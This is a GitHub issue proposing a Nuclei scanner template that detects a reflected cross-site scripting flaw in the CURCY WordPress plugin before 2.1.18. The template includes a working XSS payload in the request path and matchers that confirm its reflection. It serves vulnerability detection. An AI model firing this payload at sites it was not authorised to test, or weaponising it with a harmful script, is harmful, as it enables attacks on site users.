### ISSUE TITLE
CURCY < 2.1.18 - Reflected Cross-Site Scripting

### ISSUE THREAD

**Issue by akincibor** [projectdiscovery/nuclei-templates#4693]
```yaml
id: curcy-xss

info:
  name: CURCY < 2.1.18 - Reflected Cross-Site Scripting
  author: Akincibor
  severity: medium
  description: The plugin does not escape some generated URLs before outputting them back in attributes, leading to Reflected Cross-Site Scripting.
  reference:
    - https://wpscan.com/vulnerability/6ebafb52-e167-40bc-a86c-b9840b2b9b37
  tags: wp-plugin,xss,wp,wordpress

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-admin/admin.php?page=wc-reports&a"><script>alert(document.domain)</script>'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
```
